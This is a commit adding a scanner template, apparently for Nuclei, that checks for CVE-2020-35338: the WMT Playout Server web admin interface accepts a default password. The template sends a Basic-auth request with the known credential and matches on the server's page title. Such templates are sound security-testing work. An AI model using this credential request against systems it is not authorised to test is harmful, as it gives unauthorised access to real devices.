commit
db86429078
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2020-35338
|
||||
|
||||
info:
|
||||
author: Jeya Seelan
|
||||
severity: critical
|
||||
name: Default Credentials of WMT Server
|
||||
description: The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-35338
|
||||
- https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa
|
||||
tags: cve,cve2020,wmt,default-login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/server/"
|
||||
headers:
|
||||
Authorization: "Basic OnBva29u"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<title>WMT Server playout"
|
Loading…
Reference in New Issue